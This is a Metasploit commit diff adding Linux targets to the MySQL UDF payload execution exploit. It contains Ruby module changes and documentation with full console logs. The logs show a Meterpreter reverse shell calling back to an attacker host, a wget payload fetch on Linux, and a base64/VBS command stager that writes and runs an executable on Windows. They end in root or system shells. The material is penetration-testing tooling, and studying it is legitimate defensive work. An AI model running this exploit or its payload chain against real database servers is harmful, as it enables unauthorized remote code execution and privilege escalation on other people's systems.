Land #9170, Linux UDF for mysql_udf_payload

2017-12-21 20:48:24 -06:00 · 2017-12-21 20:48:24 -06:00 · caae33b417
parent 909caa0425 c9e3b8816b
commit caae33b417
5 changed files with 206 additions and 10 deletions
--- a/data/exploits/mysql/lib_mysqludf_sys_32.so
+++ b/data/exploits/mysql/lib_mysqludf_sys_32.so
--- a/data/exploits/mysql/lib_mysqludf_sys_64.so
+++ b/data/exploits/mysql/lib_mysqludf_sys_64.so
--- a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md
+++ b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md
@ -0,0 +1,175 @@
+## Vulnerable Application
+
+This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder.
+The file is then loaded by mysql, and arbitrary commands can be run.  There are several caveats for this to
+function however, including:
+1. `secure_file_priv`, a mysql setting, must be changed from the default to allow writing
+to mysql's plugins folder
+2. on Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled.  Equivalents on other linux systems most likely need the same
+3. the mysql folder must be writable
+
+### Linux (Ubuntu 16.04 x64) Configuration
+
+In this configuration, we'll run mysql as root so we have a priv escalate.
+
+ 1. Edit `/lib/systemd/system/mysql.service` and set `User=root`
+ 2. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`.  After the `[mysqld]` section, change `user=mysql` to `user=root` 
+ 3. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`.  After the `[mysqld]` section, add `secure_file_priv=""` 
+ 4. Disable app-armor for mysql: `sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld`
+ 5. Restart mysql service: `sudo systemctl restart mysql.service`
+
+If you need to make the root user accessible remotely
+```
+GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
+FLUSH PRIVILEGES;
+```
+or
+```
+update user set host='%' where host='127.0.0.1';
+```
+
+### Windows (Server 2012 x64) Configuration
+
+One good reference for these instructions is [PR #5334](https://github.com/rapid7/metasploit-framework/pull/5334)
+
+  1. Download and install mysql installer
+  2. Install dependencies including, at the time of writing, Visual C++ 2013 Redistributable Package.
+  3. Edit `C:\ProgramData\MySQL\MySQL Server\MySQL Server *\my.ini` and change the value of `secure-file-priv=` to `""`
+  4. Make the `C:\Program Files\MySQL\MySQL Server *\lib\plugin` folder permissions writable by the MySQL (service) user.
+
+If you need to make the root user accessible remotely
+```
+GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
+FLUSH PRIVILEGES;
+```
+or
+```
+update user set host='%' where host='127.0.0.1';
+```
+
+## Verification Steps
+
+  1. Install MySQL and make it vulnerable as described above
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/mysql/mysql_udf_payload```
+  4. Do: ```set rhost [ip]```
+  5. Do: ```set srvhost [ip]```
+  6. Make sure target and payload are correct
+  7. Set mysql login information
+  8. Do: ```exploit```
+  9. You should get a shell.
+
+## Options
+
+  **FORCE_UDF_UPLOAD**
+
+  This option will force the uploading of a UDF dll/so file even if one exists which has a system call already
+
+## Scenarios
+
+### Ubuntu 16.04 with MySQL 5.7.20
+
+In this case, the service has been configured as noted in the first section of this document, a remotely accessible MySQL running as root.
+
+```
+[*] Processing udf.rc for ERB directives.
+resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
+resource (udf.rc)> set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+resource (udf.rc)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (udf.rc)> set rhost 2.2.2.2
+rhost => 2.2.2.2
+resource (udf.rc)> set srvhost 1.1.1.1
+srvhost => 1.1.1.1
+resource (udf.rc)> set srvport 64423
+srvport => 64423
+resource (udf.rc)> set password wordpress
+password => wordpress
+resource (udf.rc)> set target 1
+target => 1
+resource (udf.rc)> set verbose true
+verbose => true
+msf exploit(mysql_udf_payload) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:3306 - Checking target architecture...
+[*] 2.2.2.2:3306 - Checking for sys_exec()...
+[*] 2.2.2.2:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
+[*] 2.2.2.2:3306 - Using URL: http://1.1.1.1:64423/YMDYyVp1fG
+[*] 2.2.2.2:3306 - Client 2.2.2.2 (Wget/1.17.1 (linux-gnu)) requested /YMDYyVp1fG
+[*] 2.2.2.2:3306 - Sending payload to 2.2.2.2 (Wget/1.17.1 (linux-gnu))
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (826872 bytes) to 2.2.2.2
+[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46330) at 2017-10-30 23:22:08 -0400
+[-] 2.2.2.2:3306 - Exploit failed: Rex::StreamClosedError Stream #<Socket:0x00561e7e1758e8> is closed.
+[*] 2.2.2.2:3306 - Server stopped.
+[*] Exploit completed, but no session was created.
+msf exploit(mysql_udf_payload) > sessions -i 4
+[*] Starting interaction with 4...
+
+meterpreter > sysinfo
+Computer     : 2.2.2.2
+OS           :  (Linux 4.4.0-98-generic)
+Architecture : x64
+Meterpreter  : x86/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+### Windows Server 2012 with MySQL 5.7.20
+
+```
+[*] Processing udf.rc for ERB directives.
+resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
+resource (udf.rc)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (udf.rc)> set srvhost 1.1.1.1
+srvhost => 1.1.1.1
+resource (udf.rc)> set srvport 64423
+srvport => 64423
+resource (udf.rc)> set verbose true
+verbose => true
+msf exploit(mysql_udf_payload) > set target 0
+target => 0
+msf exploit(mysql_udf_payload) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(mysql_udf_payload) > set rhost 3.3.3.3
+rhost => 3.3.3.3
+msf exploit(mysql_udf_payload) > set password mysql
+password => mysql
+msf exploit(mysql_udf_payload) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 3.3.3.3:3306 - Checking target architecture...
+[*] 3.3.3.3:3306 - Checking for sys_exec()...
+[*] 3.3.3.3:3306 - Checking target architecture...
+[*] 3.3.3.3:3306 - Checking for MySQL plugin directory...
+[*] 3.3.3.3:3306 - Target arch (win64) and target path both okay.
+[*] 3.3.3.3:3306 - Uploading lib_mysqludf_sys_64.dll library to C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/jfAzUfJP.dll...
+[*] 3.3.3.3:3306 - Checking for sys_exec()...
+[*] 3.3.3.3:3306 - Executing: echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAyzSjSgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAAB2HwAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
+[*] 3.3.3.3:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
+```
+...snip...
+```
+[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
+[*] 3.3.3.3:3306 - Command Stager progress -  96.76% done (98934/102246 bytes)
+[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\EkEiJ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\GTKoi.vbs & echo Set file = fs.GetFile("%TEMP%\EkEiJ.b64") >>%TEMP%\GTKoi.vbs & echo If file.Size Then >>%TEMP%\GTKoi.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\EkEiJ.b64", 1) >>%TEMP%\GTKoi.vbs & echo data = fd.ReadAll >>%TEMP%\GTKoi.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\GTKoi.vbs & echo data = base64_decode(data) >>%TEMP%\GTKoi.vbs & echo fd.Close >>%TEMP%\GTKoi.vbs
+[*] 3.3.3.3:3306 - Command Stager progress -  98.19% done (100400/102246 bytes)
+[*] 3.3.3.3:3306 - Executing: echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\CVVsw.exe", 2, True) >>%TEMP%\GTKoi.vbs & echo ofs.Write data >>%TEMP%\GTKoi.vbs & echo ofs.close >>%TEMP%\GTKoi.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\GTKoi.vbs & echo shell.run "%TEMP%\CVVsw.exe", 0, false >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\GTKoi.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\GTKoi.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\GTKoi.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\GTKoi.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\GTKoi.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\GTKoi.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\GTKoi.vbs & echo If Not w2 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\GTKoi.vbs & echo If  Not w3 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w4 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\GTKoi.vbs & echo Next >>%TEMP%\GTKoi.vbs & echo base64_decode = strOut >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\GTKoi.vbs
+[*] 3.3.3.3:3306 - Command Stager progress -  99.59% done (101827/102246 bytes)
+[*] 3.3.3.3:3306 - Executing: echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\GTKoi.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\GTKoi.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & cscript //nologo %TEMP%\GTKoi.vbs
+[*] 3.3.3.3:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
+[*] Sending stage (179267 bytes) to 3.3.3.3
+[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 3.3.3.3:49165) at 2017-11-02 23:12:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-OBKF2JFCDKL
+OS              : Windows 2012 (Build 9200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+```
--- a/lib/msf/core/exploit/mysql.rb
+++ b/lib/msf/core/exploit/mysql.rb
@ -144,21 +144,32 @@ module Exploit::Remote::MYSQL
    binname = Rex::Text.rand_text_alpha(8)
    binpath = tmpdir << binname
    print_status "Uploading binary as #{binpath}..."
+    print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"
    res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
    return res
  end

  def mysql_upload_sys_udf(arch=:win32,target_path=nil)
-    fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
+    case arch
+    when :win32
+      fname = 'lib_mysqludf_sys_32.dll'
+    when :win64
+      fname = 'lib_mysqludf_sys_64.dll'
+    when :linux32
+      fname = 'lib_mysqludf_sys_32.so'
+    when :linux64
+      fname = 'lib_mysqludf_sys_64.so'
+    end
    sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
    data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
    blob = "0x"
    blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
    dll_name = Rex::Text.rand_text_alpha(8)
-    target_dll = target_path << dll_name << ".dll"
+    [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'
+    target_dll = target_path << dll_name << extension
    print_status "Uploading #{fname} library to #{target_dll}..."
    mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
-    return dll_name << ".dll"
+    return dll_name << extension
  end

  def mysql_drop_and_create_sys_exec(soname)
@ -181,6 +192,15 @@ module Exploit::Remote::MYSQL
      :win64
    when /Win32/i
      :win32
+    when /Linux/i
+      # we need a second query to determine bits
+      res = mysql_get_variable("@@version_compile_machine")
+      return :unknown unless res
+      if res =~ /x86_64/i
+        :linux64
+      else
+        :linux32
+      end
    else
      res
    end
@ -189,7 +209,7 @@ module Exploit::Remote::MYSQL
  def mysql_add_sys_exec
    arch = mysql_get_arch
    case arch
-    when :win64,:win32
+    when :win64,:win32,:linux64,:linux32
      target_path = mysql_get_plugin_dir
      if target_path
        print_status "Target arch (#{arch}) and target path both okay."
--- a/modules/exploits/multi/mysql/mysql_udf_payload.rb
+++ b/modules/exploits/multi/mysql/mysql_udf_payload.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
    super(
      update_info(
        info,
-        'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
+        'Name'           => 'Oracle MySQL UDF Payload Execution',
        'Description'    => %q{
          This module creates and enables a custom UDF (user defined function) on the
          target host via the SELECT ... into DUMPFILE method of binary injection. On
@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
        'Author'         =>
          [
            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
-            'todb' # this Metasploit module
+            'todb', # this Metasploit module
+            'h00die' # linux addition
          ],
        'License'        => MSF_LICENSE,
        'References'     =>
@ -35,12 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote
            # Bernardo's work with cmd exec via udf
            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
          ],
-        'Platform'       => 'win',
+        'Platform'       => ['win', 'linux'],
        'Targets'        =>
          [
-            [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
          ],
-        'CmdStagerFlavor' => 'vbs',
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
    ))
@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote

    if not m
      return
-    elsif not [:win32,:win64].include?(@mysql_arch)
+    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else